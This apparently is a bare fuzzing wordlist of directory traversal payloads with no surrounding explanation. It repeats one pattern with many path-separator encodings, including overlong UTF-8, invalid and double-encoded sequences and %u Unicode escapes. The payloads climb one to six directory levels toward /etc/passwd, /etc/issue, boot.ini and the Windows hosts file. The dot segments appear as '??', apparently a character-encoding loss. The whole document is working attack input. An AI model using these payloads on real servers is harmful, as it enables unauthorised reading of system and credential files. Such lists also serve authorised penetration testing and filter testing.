-??%c1%9c??%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -??%c1%9c??%c1%9c??%c1%9cetc%c1%9cpasswd -??%c1%9c??%c1%9c??%c1%9cetc%c1%9cissue -??%c1%9c??%c1%9c??%c1%9cboot.ini -??%c1%9c??%c1%9c??%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -??%c1%9c??%c1%9c??%c1%9c??%c1%9cetc%c1%9cpasswd -??%c1%9c??%c1%9c??%c1%9c??%c1%9cetc%c1%9cissue -??%c1%9c??%c1%9c??%c1%9c??%c1%9cboot.ini -??%c1%9c??%c1%9c??%c1%9c??%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -??%c1%9c??%c1%9c??%c1%9c??%c1%9c??%c1%9cetc%c1%9cpasswd -??%c1%9c??%c1%9c??%c1%9c??%c1%9c??%c1%9cetc%c1%9cissue -??%c1%9c??%c1%9c??%c1%9c??%c1%9c??%c1%9cboot.ini -??%c1%9c??%c1%9c??%c1%9c??%c1%9c??%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -??%c1%9c??%c1%9c??%c1%9c??%c1%9c??%c1%9c??%c1%9cetc%c1%9cpasswd -??%c1%9c??%c1%9c??%c1%9c??%c1%9c??%c1%9c??%c1%9cetc%c1%9cissue -??%c1%9c??%c1%9c??%c1%9c??%c1%9c??%c1%9c??%c1%9cboot.ini -??%c1%9c??%c1%9c??%c1%9c??%c1%9c??%c1%9c??%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -??%c1%pcetc%c1%pcpasswd -??%c1%pcetc%c1%pcissue -??%c1%pcboot.ini -??%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -??%c1%pc??%c1%pcetc%c1%pcpasswd -??%c1%pc??%c1%pcetc%c1%pcissue -??%c1%pc??%c1%pcboot.ini -??%c1%pc??%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -??%c1%pc??%c1%pc??%c1%pcetc%c1%pcpasswd -??%c1%pc??%c1%pc??%c1%pcetc%c1%pcissue -??%c1%pc??%c1%pc??%c1%pcboot.ini -??%c1%pc??%c1%pc??%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -??%c1%pc??%c1%pc??%c1%pc??%c1%pcetc%c1%pcpasswd -??%c1%pc??%c1%pc??%c1%pc??%c1%pcetc%c1%pcissue -??%c1%pc??%c1%pc??%c1%pc??%c1%pcboot.ini -??%c1%pc??%c1%pc??%c1%pc??%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -??%c1%pc??%c1%pc??%c1%pc??%c1%pc??%c1%pcetc%c1%pcpasswd -??%c1%pc??%c1%pc??%c1%pc??%c1%pc??%c1%pcetc%c1%pcissue -??%c1%pc??%c1%pc??%c1%pc??%c1%pc??%c1%pcboot.ini -??%c1%pc??%c1%pc??%c1%pc??%c1%pc??%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -??%c1%pc??%c1%pc??%c1%pc??%c1%pc??%c1%pc??%c1%pcetc%c1%pcpasswd -??%c1%pc??%c1%pc??%c1%pc??%c1%pc??%c1%pc??%c1%pcetc%c1%pcissue -??%c1%pc??%c1%pc??%c1%pc??%c1%pc??%c1%pc??%c1%pcboot.ini -??%c1%pc??%c1%pc??%c1%pc??%c1%pc??%c1%pc??%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -??%c0%9vetc%c0%9vpasswd -??%c0%9vetc%c0%9vissue -??%c0%9vboot.ini -??%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -??%c0%9v??%c0%9vetc%c0%9vpasswd -??%c0%9v??%c0%9vetc%c0%9vissue -??%c0%9v??%c0%9vboot.ini -??%c0%9v??%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -??%c0%9v??%c0%9v??%c0%9vetc%c0%9vpasswd -??%c0%9v??%c0%9v??%c0%9vetc%c0%9vissue -??%c0%9v??%c0%9v??%c0%9vboot.ini -??%c0%9v??%c0%9v??%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -??%c0%9v??%c0%9v??%c0%9v??%c0%9vetc%c0%9vpasswd -??%c0%9v??%c0%9v??%c0%9v??%c0%9vetc%c0%9vissue -??%c0%9v??%c0%9v??%c0%9v??%c0%9vboot.ini -??%c0%9v??%c0%9v??%c0%9v??%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -??%c0%9v??%c0%9v??%c0%9v??%c0%9v??%c0%9vetc%c0%9vpasswd -??%c0%9v??%c0%9v??%c0%9v??%c0%9v??%c0%9vetc%c0%9vissue -??%c0%9v??%c0%9v??%c0%9v??%c0%9v??%c0%9vboot.ini -??%c0%9v??%c0%9v??%c0%9v??%c0%9v??%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -??%c0%9v??%c0%9v??%c0%9v??%c0%9v??%c0%9v??%c0%9vetc%c0%9vpasswd -??%c0%9v??%c0%9v??%c0%9v??%c0%9v??%c0%9v??%c0%9vetc%c0%9vissue -??%c0%9v??%c0%9v??%c0%9v??%c0%9v??%c0%9v??%c0%9vboot.ini -??%c0%9v??%c0%9v??%c0%9v??%c0%9v??%c0%9v??%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -??%c0%qfetc%c0%qfpasswd -??%c0%qfetc%c0%qfissue -??%c0%qfboot.ini -??%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -??%c0%qf??%c0%qfetc%c0%qfpasswd -??%c0%qf??%c0%qfetc%c0%qfissue -??%c0%qf??%c0%qfboot.ini -??%c0%qf??%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -??%c0%qf??%c0%qf??%c0%qfetc%c0%qfpasswd -??%c0%qf??%c0%qf??%c0%qfetc%c0%qfissue -??%c0%qf??%c0%qf??%c0%qfboot.ini -??%c0%qf??%c0%qf??%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -??%c0%qf??%c0%qf??%c0%qf??%c0%qfetc%c0%qfpasswd -??%c0%qf??%c0%qf??%c0%qf??%c0%qfetc%c0%qfissue -??%c0%qf??%c0%qf??%c0%qf??%c0%qfboot.ini -??%c0%qf??%c0%qf??%c0%qf??%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -??%c0%qf??%c0%qf??%c0%qf??%c0%qf??%c0%qfetc%c0%qfpasswd -??%c0%qf??%c0%qf??%c0%qf??%c0%qf??%c0%qfetc%c0%qfissue -??%c0%qf??%c0%qf??%c0%qf??%c0%qf??%c0%qfboot.ini -??%c0%qf??%c0%qf??%c0%qf??%c0%qf??%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -??%c0%qf??%c0%qf??%c0%qf??%c0%qf??%c0%qf??%c0%qfetc%c0%qfpasswd -??%c0%qf??%c0%qf??%c0%qf??%c0%qf??%c0%qf??%c0%qfetc%c0%qfissue -??%c0%qf??%c0%qf??%c0%qf??%c0%qf??%c0%qf??%c0%qfboot.ini -??%c0%qf??%c0%qf??%c0%qf??%c0%qf??%c0%qf??%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -??%c1%8setc%c1%8spasswd -??%c1%8setc%c1%8sissue -??%c1%8sboot.ini -??%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -??%c1%8s??%c1%8setc%c1%8spasswd -??%c1%8s??%c1%8setc%c1%8sissue -??%c1%8s??%c1%8sboot.ini -??%c1%8s??%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -??%c1%8s??%c1%8s??%c1%8setc%c1%8spasswd -??%c1%8s??%c1%8s??%c1%8setc%c1%8sissue -??%c1%8s??%c1%8s??%c1%8sboot.ini -??%c1%8s??%c1%8s??%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -??%c1%8s??%c1%8s??%c1%8s??%c1%8setc%c1%8spasswd -??%c1%8s??%c1%8s??%c1%8s??%c1%8setc%c1%8sissue -??%c1%8s??%c1%8s??%c1%8s??%c1%8sboot.ini -??%c1%8s??%c1%8s??%c1%8s??%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -??%c1%8s??%c1%8s??%c1%8s??%c1%8s??%c1%8setc%c1%8spasswd -??%c1%8s??%c1%8s??%c1%8s??%c1%8s??%c1%8setc%c1%8sissue -??%c1%8s??%c1%8s??%c1%8s??%c1%8s??%c1%8sboot.ini -??%c1%8s??%c1%8s??%c1%8s??%c1%8s??%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -??%c1%8s??%c1%8s??%c1%8s??%c1%8s??%c1%8s??%c1%8setc%c1%8spasswd -??%c1%8s??%c1%8s??%c1%8s??%c1%8s??%c1%8s??%c1%8setc%c1%8sissue -??%c1%8s??%c1%8s??%c1%8s??%c1%8s??%c1%8s??%c1%8sboot.ini -??%c1%8s??%c1%8s??%c1%8s??%c1%8s??%c1%8s??%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -??%c1%1cetc%c1%1cpasswd -??%c1%1cetc%c1%1cissue -??%c1%1cboot.ini -??%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -??%c1%1c??%c1%1cetc%c1%1cpasswd -??%c1%1c??%c1%1cetc%c1%1cissue -??%c1%1c??%c1%1cboot.ini -??%c1%1c??%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -??%c1%1c??%c1%1c??%c1%1cetc%c1%1cpasswd -??%c1%1c??%c1%1c??%c1%1cetc%c1%1cissue -??%c1%1c??%c1%1c??%c1%1cboot.ini -??%c1%1c??%c1%1c??%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -??%c1%1c??%c1%1c??%c1%1c??%c1%1cetc%c1%1cpasswd -??%c1%1c??%c1%1c??%c1%1c??%c1%1cetc%c1%1cissue -??%c1%1c??%c1%1c??%c1%1c??%c1%1cboot.ini -??%c1%1c??%c1%1c??%c1%1c??%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -??%c1%1c??%c1%1c??%c1%1c??%c1%1c??%c1%1cetc%c1%1cpasswd -??%c1%1c??%c1%1c??%c1%1c??%c1%1c??%c1%1cetc%c1%1cissue -??%c1%1c??%c1%1c??%c1%1c??%c1%1c??%c1%1cboot.ini -??%c1%1c??%c1%1c??%c1%1c??%c1%1c??%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -??%c1%1c??%c1%1c??%c1%1c??%c1%1c??%c1%1c??%c1%1cetc%c1%1cpasswd -??%c1%1c??%c1%1c??%c1%1c??%c1%1c??%c1%1c??%c1%1cetc%c1%1cissue -??%c1%1c??%c1%1c??%c1%1c??%c1%1c??%c1%1c??%c1%1cboot.ini -??%c1%1c??%c1%1c??%c1%1c??%c1%1c??%c1%1c??%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -??%c1%afetc%c1%afpasswd -??%c1%afetc%c1%afissue -??%c1%afboot.ini -??%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -??%c1%af??%c1%afetc%c1%afpasswd -??%c1%af??%c1%afetc%c1%afissue -??%c1%af??%c1%afboot.ini -??%c1%af??%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -??%c1%af??%c1%af??%c1%afetc%c1%afpasswd -??%c1%af??%c1%af??%c1%afetc%c1%afissue -??%c1%af??%c1%af??%c1%afboot.ini -??%c1%af??%c1%af??%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -??%c1%af??%c1%af??%c1%af??%c1%afetc%c1%afpasswd -??%c1%af??%c1%af??%c1%af??%c1%afetc%c1%afissue -??%c1%af??%c1%af??%c1%af??%c1%afboot.ini -??%c1%af??%c1%af??%c1%af??%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -??%c1%af??%c1%af??%c1%af??%c1%af??%c1%afetc%c1%afpasswd -??%c1%af??%c1%af??%c1%af??%c1%af??%c1%afetc%c1%afissue -??%c1%af??%c1%af??%c1%af??%c1%af??%c1%afboot.ini -??%c1%af??%c1%af??%c1%af??%c1%af??%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -??%c1%af??%c1%af??%c1%af??%c1%af??%c1%af??%c1%afetc%c1%afpasswd -??%c1%af??%c1%af??%c1%af??%c1%af??%c1%af??%c1%afetc%c1%afissue -??%c1%af??%c1%af??%c1%af??%c1%af??%c1%af??%c1%afboot.ini -??%c1%af??%c1%af??%c1%af??%c1%af??%c1%af??%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -??%bg%qfetc%bg%qfpasswd -??%bg%qfetc%bg%qfissue -??%bg%qfboot.ini -??%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -??%bg%qf??%bg%qfetc%bg%qfpasswd -??%bg%qf??%bg%qfetc%bg%qfissue -??%bg%qf??%bg%qfboot.ini -??%bg%qf??%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -??%bg%qf??%bg%qf??%bg%qfetc%bg%qfpasswd -??%bg%qf??%bg%qf??%bg%qfetc%bg%qfissue -??%bg%qf??%bg%qf??%bg%qfboot.ini -??%bg%qf??%bg%qf??%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -??%bg%qf??%bg%qf??%bg%qf??%bg%qfetc%bg%qfpasswd -??%bg%qf??%bg%qf??%bg%qf??%bg%qfetc%bg%qfissue -??%bg%qf??%bg%qf??%bg%qf??%bg%qfboot.ini -??%bg%qf??%bg%qf??%bg%qf??%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -??%bg%qf??%bg%qf??%bg%qf??%bg%qf??%bg%qfetc%bg%qfpasswd -??%bg%qf??%bg%qf??%bg%qf??%bg%qf??%bg%qfetc%bg%qfissue -??%bg%qf??%bg%qf??%bg%qf??%bg%qf??%bg%qfboot.ini -??%bg%qf??%bg%qf??%bg%qf??%bg%qf??%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -??%bg%qf??%bg%qf??%bg%qf??%bg%qf??%bg%qf??%bg%qfetc%bg%qfpasswd -??%bg%qf??%bg%qf??%bg%qf??%bg%qf??%bg%qf??%bg%qfetc%bg%qfissue -??%bg%qf??%bg%qf??%bg%qf??%bg%qf??%bg%qf??%bg%qfboot.ini -??%bg%qf??%bg%qf??%bg%qf??%bg%qf??%bg%qf??%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -??%u2215etc%u2215passwd -??%u2215etc%u2215issue -??%u2215boot.ini -??%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -??%u2215??%u2215etc%u2215passwd -??%u2215??%u2215etc%u2215issue -??%u2215??%u2215boot.ini -??%u2215??%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -??%u2215??%u2215??%u2215etc%u2215passwd -??%u2215??%u2215??%u2215etc%u2215issue -??%u2215??%u2215??%u2215boot.ini -??%u2215??%u2215??%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -??%u2215??%u2215??%u2215??%u2215etc%u2215passwd -??%u2215??%u2215??%u2215??%u2215etc%u2215issue -??%u2215??%u2215??%u2215??%u2215boot.ini -??%u2215??%u2215??%u2215??%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -??%u2215??%u2215??%u2215??%u2215??%u2215etc%u2215passwd -??%u2215??%u2215??%u2215??%u2215??%u2215etc%u2215issue -??%u2215??%u2215??%u2215??%u2215??%u2215boot.ini -??%u2215??%u2215??%u2215??%u2215??%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -??%u2215??%u2215??%u2215??%u2215??%u2215??%u2215etc%u2215passwd -??%u2215??%u2215??%u2215??%u2215??%u2215??%u2215etc%u2215issue -??%u2215??%u2215??%u2215??%u2215??%u2215??%u2215boot.ini -??%u2215??%u2215??%u2215??%u2215??%u2215??%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -??%u2216etc%u2216passwd -??%u2216etc%u2216issue -??%u2216boot.ini -??%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -??%u2216??%u2216etc%u2216passwd -??%u2216??%u2216etc%u2216issue -??%u2216??%u2216boot.ini -??%u2216??%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -??%u2216??%u2216??%u2216etc%u2216passwd -??%u2216??%u2216??%u2216etc%u2216issue -??%u2216??%u2216??%u2216boot.ini -??%u2216??%u2216??%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -??%u2216??%u2216??%u2216??%u2216etc%u2216passwd -??%u2216??%u2216??%u2216??%u2216etc%u2216issue -??%u2216??%u2216??%u2216??%u2216boot.ini -??%u2216??%u2216??%u2216??%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -??%u2216??%u2216??%u2216??%u2216??%u2216etc%u2216passwd -??%u2216??%u2216??%u2216??%u2216??%u2216etc%u2216issue -??%u2216??%u2216??%u2216??%u2216??%u2216boot.ini -??%u2216??%u2216??%u2216??%u2216??%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -??%u2216??%u2216??%u2216??%u2216??%u2216??%u2216etc%u2216passwd -??%u2216??%u2216??%u2216??%u2216??%u2216??%u2216etc%u2216issue -??%u2216??%u2216??%u2216??%u2216??%u2216??%u2216boot.ini -??%u2216??%u2216??%u2216??%u2216??%u2216??%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -??%uEFC8etc%uEFC8passwd -??%uEFC8etc%uEFC8issue -??%uEFC8boot.ini -??%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -??%uEFC8??%uEFC8etc%uEFC8passwd -??%uEFC8??%uEFC8etc%uEFC8issue -??%uEFC8??%uEFC8boot.ini -??%uEFC8??%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -??%uEFC8??%uEFC8??%uEFC8etc%uEFC8passwd -??%uEFC8??%uEFC8??%uEFC8etc%uEFC8issue -??%uEFC8??%uEFC8??%uEFC8boot.ini -??%uEFC8??%uEFC8??%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -??%uEFC8??%uEFC8??%uEFC8??%uEFC8etc%uEFC8passwd -??%uEFC8??%uEFC8??%uEFC8??%uEFC8etc%uEFC8issue -??%uEFC8??%uEFC8??%uEFC8??%uEFC8boot.ini -??%uEFC8??%uEFC8??%uEFC8??%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -??%uEFC8??%uEFC8??%uEFC8??%uEFC8??%uEFC8etc%uEFC8passwd -??%uEFC8??%uEFC8??%uEFC8??%uEFC8??%uEFC8etc%uEFC8issue -??%uEFC8??%uEFC8??%uEFC8??%uEFC8??%uEFC8boot.ini -??%uEFC8??%uEFC8??%uEFC8??%uEFC8??%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -??%uEFC8??%uEFC8??%uEFC8??%uEFC8??%uEFC8??%uEFC8etc%uEFC8passwd -??%uEFC8??%uEFC8??%uEFC8??%uEFC8??%uEFC8??%uEFC8etc%uEFC8issue -??%uEFC8??%uEFC8??%uEFC8??%uEFC8??%uEFC8??%uEFC8boot.ini -??%uEFC8??%uEFC8??%uEFC8??%uEFC8??%uEFC8??%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -??%uF025etc%uF025passwd -??%uF025etc%uF025issue -??%uF025boot.ini -??%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -??%uF025??%uF025etc%uF025passwd -??%uF025??%uF025etc%uF025issue -??%uF025??%uF025boot.ini -??%uF025??%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -??%uF025??%uF025??%uF025etc%uF025passwd -??%uF025??%uF025??%uF025etc%uF025issue -??%uF025??%uF025??%uF025boot.ini -??%uF025??%uF025??%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -??%uF025??%uF025??%uF025??%uF025etc%uF025passwd -??%uF025??%uF025??%uF025??%uF025etc%uF025issue -??%uF025??%uF025??%uF025??%uF025boot.ini -??%uF025??%uF025??%uF025??%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -??%uF025??%uF025??%uF025??%uF025??%uF025etc%uF025passwd -??%uF025??%uF025??%uF025??%uF025??%uF025etc%uF025issue -??%uF025??%uF025??%uF025??%uF025??%uF025boot.ini -??%uF025??%uF025??%uF025??%uF025??%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -??%uF025??%uF025??%uF025??%uF025??%uF025??%uF025etc%uF025passwd -??%uF025??%uF025??%uF025??%uF025??%uF025??%uF025etc%uF025issue -??%uF025??%uF025??%uF025??%uF025??%uF025??%uF025boot.ini -??%uF025??%uF025??%uF025??%uF025??%uF025??%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -??%%32%%66etc%%32%%66passwd -??%%32%%66etc%%32%%66issue -??%%32%%66boot.ini -??%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -??%%32%%66??%%32%%66etc%%32%%66passwd -??%%32%%66??%%32%%66etc%%32%%66issue -??%%32%%66??%%32%%66boot.ini -??%%32%%66??%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -??%%32%%66??%%32%%66??%%32%%66etc%%32%%66passwd -??%%32%%66??%%32%%66??%%32%%66etc%%32%%66issue -??%%32%%66??%%32%%66??%%32%%66boot.ini -??%%32%%66??%%32%%66??%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -??%%32%%66??%%32%%66??%%32%%66??%%32%%66etc%%32%%66passwd -??%%32%%66??%%32%%66??%%32%%66??%%32%%66etc%%32%%66issue -??%%32%%66??%%32%%66??%%32%%66??%%32%%66boot.ini -??%%32%%66??%%32%%66??%%32%%66??%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -??%%32%%66??%%32%%66??%%32%%66??%%32%%66??%%32%%66etc%%32%%66passwd -??%%32%%66??%%32%%66??%%32%%66??%%32%%66??%%32%%66etc%%32%%66issue -??%%32%%66??%%32%%66??%%32%%66??%%32%%66??%%32%%66boot.ini -??%%32%%66??%%32%%66??%%32%%66??%%32%%66??%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -??%%32%%66??%%32%%66??%%32%%66??%%32%%66??%%32%%66??%%32%%66etc%%32%%66passwd -??%%32%%66??%%32%%66??%%32%%66??%%32%%66??%%32%%66??%%32%%66etc%%32%%66issue -??%%32%%66??%%32%%66??%%32%%66??%%32%%66??%%32%%66??%%32%%66boot.ini -??%%32%%66??%%32%%66??%%32%%66??%%32%%66??%%32%%66??%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -??%%35%%63etc%%35%%63passwd -??%%35%%63etc%%35%%63issue -??%%35%%63boot.ini -??%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -??%%35%%63??%%35%%63etc%%35%%63passwd -??%%35%%63??%%35%%63etc%%35%%63issue -??%%35%%63??%%35%%63boot.ini -??%%35%%63??%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -??%%35%%63??%%35%%63??%%35%%63etc%%35%%63passwd -??%%35%%63??%%35%%63??%%35%%63etc%%35%%63issue -??%%35%%63??%%35%%63??%%35%%63boot.ini -??%%35%%63??%%35%%63??%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -??%%35%%63??%%35%%63??%%35%%63??%%35%%63etc%%35%%63passwd -??%%35%%63??%%35%%63??%%35%%63??%%35%%63etc%%35%%63issue -??%%35%%63??%%35%%63??%%35%%63??%%35%%63boot.ini -??%%35%%63??%%35%%63??%%35%%63??%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -??%%35%%63??%%35%%63??%%35%%63??%%35%%63??%%35%%63etc%%35%%63passwd -??%%35%%63??%%35%%63??%%35%%63??%%35%%63??%%35%%63etc%%35%%63issue -??%%35%%63??%%35%%63??%%35%%63??%%35%%63??%%35%%63boot.ini -??%%35%%63??%%35%%63??%%35%%63??%%35%%63??%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -??%%35%%63??%%35%%63??%%35%%63??%%35%%63??%%35%%63??%%35%%63etc%%35%%63passwd -??%%35%%63??%%35%%63??%%35%%63??%%35%%63??%%35%%63??%%35%%63etc%%35%%63issue -??%%35%%63??%%35%%63??%%35%%63??%%35%%63??%%35%%63??%%35%%63boot.ini -??%%35%%63??%%35%%63??%%35%%63??%%35%%63??%%35%%63??%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -??%e0%80%afetc%e0%80%afpasswd -??%e0%80%afetc%e0%80%afissue -??%e0%80%afboot.ini -??%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -??%e0%80%af??%e0%80%afetc%e0%80%afpasswd -??%e0%80%af??%e0%80%afetc%e0%80%afissue -??%e0%80%af??%e0%80%afboot.ini -??%e0%80%af??%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -??%e0%80%af??%e0%80%af??%e0%80%afetc%e0%80%afpasswd -??%e0%80%af??%e0%80%af??%e0%80%afetc%e0%80%afissue -??%e0%80%af??%e0%80%af??%e0%80%afboot.ini -??%e0%80%af??%e0%80%af??%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%afetc%e0%80%afpasswd -??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%afetc%e0%80%afissue -??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%afboot.ini -??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%afetc%e0%80%afpasswd -??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%afetc%e0%80%afissue -??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%afboot.ini -??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%afetc%e0%80%afpasswd -??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%afetc%e0%80%afissue -??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%afboot.ini -??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%af??%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -??%25c1%259cetc%25c1%259cpasswd -??%25c1%259cetc%25c1%259cissue -??%25c1%259cboot.ini -??%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -??%25c1%259c??%25c1%259cetc%25c1%259cpasswd -??%25c1%259c??%25c1%259cetc%25c1%259cissue -??%25c1%259c??%25c1%259cboot.ini -??%25c1%259c??%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -??%25c1%259c??%25c1%259c??%25c1%259cetc%25c1%259cpasswd -??%25c1%259c??%25c1%259c??%25c1%259cetc%25c1%259cissue -??%25c1%259c??%25c1%259c??%25c1%259cboot.ini -??%25c1%259c??%25c1%259c??%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259cetc%25c1%259cpasswd -??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259cetc%25c1%259cissue -??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259cboot.ini -??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259cetc%25c1%259cpasswd -??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259cetc%25c1%259cissue -??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259cboot.ini -??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259cetc%25c1%259cpasswd 